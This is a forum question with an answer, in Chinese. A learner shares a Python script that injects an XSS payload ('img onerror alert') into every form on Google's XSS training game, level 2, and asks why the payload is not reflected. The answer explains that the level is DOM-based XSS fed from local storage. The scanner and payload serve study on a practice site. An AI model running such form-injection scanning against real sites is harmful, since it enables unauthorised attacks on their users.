我一直在学习XSS和为XSS构建的谷歌游戏
http://www.xss-game.appspot.com/level2/frame
我成功地找到了这一级别的解决方案,即将脚本包装在图像标记中,但我无法使用下面的python代码找到漏洞
from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup
# One shared HTTP client reused by every request issued by the functions below.
session = HTMLSession()
def retrieve_all_forms(url):
    """Fetch *url* with the shared session and return every <form> Tag in it.

    The markup parsed is the HTML as delivered by the server (``r.html.html``);
    nothing is rendered client-side before parsing.
    """
    response = session.get(url)
    document = BeautifulSoup(response.html.html, "html.parser")
    return document.find_all("form")
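def retrieve_form_details(form):
    """Summarise a <form> Tag as a plain dict.

    Args:
        form: a BeautifulSoup Tag for a <form> element.

    Returns:
        dict with keys:
          - "action": the action attribute as written ("" when absent). It is a
            URL, and URL paths are case-sensitive, so it is no longer lower-cased.
          - "request_method": the method attribute lower-cased, "get" when absent.
          - "inputs": one {"type", "name", "value"} dict per <input> followed by
            one per <textarea>, each in document order. "name" is None for
            fields without a name attribute.
    """
    form_details = {
        # Missing action used to raise AttributeError (None.lower()); treat as "".
        "action": form.attrs.get("action", ""),
        "request_method": form.attrs.get("method", "get").lower(),
    }
    input_tags_info = []
    for itag in form.find_all("input"):
        input_tags_info.append({
            "type": itag.attrs.get("type", "text"),
            "name": itag.attrs.get("name"),
            "value": itag.attrs.get("value", ""),
        })
    for ttag in form.find_all("textarea"):
        # A <textarea> keeps its initial value as element content, not in a
        # value= attribute, so reading attrs["value"] always gave "".
        input_tags_info.append({
            "type": ttag.attrs.get("type", "text"),
            "name": ttag.attrs.get("name"),
            "value": ttag.get_text(),
        })
    form_details["inputs"] = input_tags_info
    return form_details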
def payload_insulation(form, payload):
    """Write *payload* into the value of every editable field of *form*.

    *form* is a dict as produced by retrieve_form_details. Fields typed
    "hidden" or "submit" are left untouched; every field that is rewritten is
    printed before the assignment. The dict is modified in place and returned.
    """
    untouched_types = ("hidden", "submit")
    for field in form["inputs"]:
        if field["type"] in untouched_types:
            continue
        print(field)
        field["value"] = payload
    return form
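def submit_form(url, form, payload):
    """Submit *form* to *url* and report whether *payload* is echoed back.

    Args:
        url: the URL the request is sent to.
        form: dict with "request_method" and "inputs" keys
            (as produced by retrieve_form_details).
        payload: the string searched for in the response body.

    Returns:
        1 if *payload* occurs literally in the response text, else 0.

    Raises:
        ValueError: if "request_method" is neither "get" nor "post". Previously
            any other value left ``res`` unbound and raised UnboundLocalError.

    Only a literal echo in the HTTP response body counts: content the page
    inserts client-side with JavaScript (for example from local storage) is
    not part of the response text, so such a sink is reported as 0 here.
    """
    # Browsers do not submit fields without a name attribute; skip them rather
    # than sending a None key. Later duplicates win, as in the original dict build.
    data = {
        field["name"]: field["value"]
        for field in form["inputs"]
        if field["name"] is not None
    }
    print(data)
    method = form["request_method"]
    if method == "post":
        res = session.post(url, data=data)
    elif method == "get":
        res = session.get(url, params=data)
    else:
        raise ValueError(f"unsupported form method: {method!r}")
    return 1 if payload in res.text else 0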
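def form_xss(url, payload):
    """Check every form on *url* for a literal reflection of *payload*.

    Each form is parsed with retrieve_form_details, filled by
    payload_insulation and submitted with submit_form to the URL its own
    action attribute points at, resolved against *url* with urljoin (so a
    missing or relative action resolves to the page itself).

    Returns:
        list of (payload, True) tuples, one per form whose response contained
        the payload literally. Forms with no echo contribute nothing.
    """
    results = []
    for form in retrieve_all_forms(url):
        form_details = payload_insulation(retrieve_form_details(form), payload)
        # Submit where a browser would: the form's action, not the page URL.
        target = urljoin(url, form_details.get("action") or "")
        if submit_form(target, form_details, payload) == 1:
            results.append((payload, True))
    return results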
# Run the check against the training page and print the per-form results.
target_url = "http://www.xss-game.appspot.com/level2/frame"
marker = '<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'
print(form_xss(target_url, marker))
我一直试图通过post发送数据,但img标记没有出现在响应中。有人能告诉我这段代码缺少什么吗?谢谢
页面使用 JavaScript 从本地存储中读取帖子,如页面源码所示:
因此这是一个基于 DOM 的 XSS:响应中不会包含该标记,因为注入的内容需要 JavaScript 和本地存储才会出现在页面中。